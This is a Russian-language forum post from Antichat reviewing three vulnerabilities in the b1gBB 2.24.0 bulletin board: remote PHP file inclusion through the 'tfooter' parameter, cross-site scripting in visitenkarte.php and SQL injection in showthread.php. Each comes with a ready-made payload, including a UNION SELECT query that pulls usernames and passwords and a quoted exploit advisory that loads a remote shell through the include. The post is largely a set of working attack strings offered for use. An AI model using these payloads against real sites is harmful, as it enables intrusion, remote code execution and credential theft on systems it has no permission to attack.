Форум АНТИЧАТ - [Обзор уязвимостей b1gBB]

PHP-Include
b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "tfooter" в сценарии footer.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP.
Пример:

Код:

http://[host]/path/footer.inc.php?tfooter=[file]

Межсайтовый скриптинг
b1gbb 2.24.0
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему и выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «user» сценарием visitenkarte.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Пример:

Код:

/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

SQL-инъекция

b1gbb 2.24.0
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id» сценарием showthread.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример

Код:

//showthread.php?id=-1%20union%20all%20select%200,1,2,3,4,5,6, concat(username,passwort),8%20FROM%20 cebb_user%20%20where%20id=1/*

XSS

Код:

/visitenkarte.php?user=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

Exploite

Код:

# b1gBB (b1g Bulletion Board) (footer.inc.php) Remote File Inclusion

Vulnerabilities



# D.Script :

     http://switch.dl.sourceforge.net/sourceforge/b1gbb/b1gbb-2.24.0.zip



# V.Code :

     include $tfooter



# In :

     footer.inc.php



# Exploits :

http://www.name/path/footer.inc.php?tfooter=shell?





# Discovered by:

     Rf7awy

x59@hotmail.it